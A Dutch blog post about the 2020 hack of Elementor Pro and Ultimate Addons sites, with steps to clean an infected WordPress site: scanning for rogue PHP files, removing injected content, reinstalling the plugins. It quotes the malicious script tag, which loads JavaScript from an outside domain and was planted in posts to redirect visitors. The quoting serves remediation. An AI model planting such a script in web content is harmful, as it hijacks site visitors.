Help! Mijn Elementor website is gehackt.

Sinds begin mei 2020 is er een groot lek geconstateerd in de Elementor PRO plugin samen met de Ultimate Addons voor Elementor plugin van de ontwikkelaars achter Elementor en Astra: Brainstorm Force. Miljoenen websites zijn getroffen en geïnfecteerd met malware waarbij de website automatisch werd geredirect naar een externe website. Onderstaande stappen hebben mij geholpen om het probleem te verhelpen.

Dit behandelen we in dit artikel:

Schermafbeelding 2020 06 12 om 11.51.25 1024x507 - Help! Mijn Elementor website is gehackt.

Wat houdt de hack in?

Vreemde gebruikers registreerden zich op de website en slechts na enkele dagen tot weken werd de malware geplaatst/geactiveerd. Dit kan al gevolg hebben dat je geen recente back-up meer hebt van een versie waarbij de hack nog niet binnen was getreden.

Helaas hebben wij hier ook mee te maken gehad. Back-ups terugplaatsen van 14 dagen geleden gaf een tijdelijke oplossingen, maar de bestanden waren al geïnfecteerd waardoor na enkele dagen de redirect weer te zien was. Een eerdere versie uit het verleden terugplaatsen is niet altijd wenselijk omdat er in enkele dagen tot weken tijd al een hoop werk in een website kan zitten zoals dat hier het geval was.

Hoe los ik de Elementor hack op?

Als je website symptomen van de hack blijft geven dan is je website dus blijvend geïnfecteerd. Je zult nu handmatig de hack moeten verwijderen.
Er zijn drie oorzaken die je moet oplossen:

  1. Scan de website met een Malware scanner die op zoek gaat naar vreemde of mogelijk geïnfecteerde bestanden. De bestanden die je via SFTP zult moeten verwijderen hebben vergelijkbare namen als xfie3492.php.
  2. Op vrijwel alle posts (pagina’s, posts en custom post type’s) is een javascript bestand geplaatst binnen de content. De code die ik trof:
    <script src='https://dontstopthismusics.com/t.js?s=5' type='text/javascript'></script>
  3. In principe zou de website nu weer moeten werken. Echter is Elementor nog steeds geïnfecteerd en zul je bij het openen van de Pagebuilder dezelfde redirect te zien krijgen. Het updaten van de plugins zal geen oplossing bieden daarom is het noodzakelijk om Elementor, Elementor Pro en Ultimate Addons te verwijderen en opnieuw met de laatste versies toe te voegen. Al je gemaakte templates en global elements zul je niet kwijtraken. Deze worden in de database en upload directory opgeslagen.
  4. Done!

Hopelijk lost dit je probleem op en bespaar ik je de 6 uur die het van mijn leven heeft gekost. 🙁

Kies voor data gedreven groei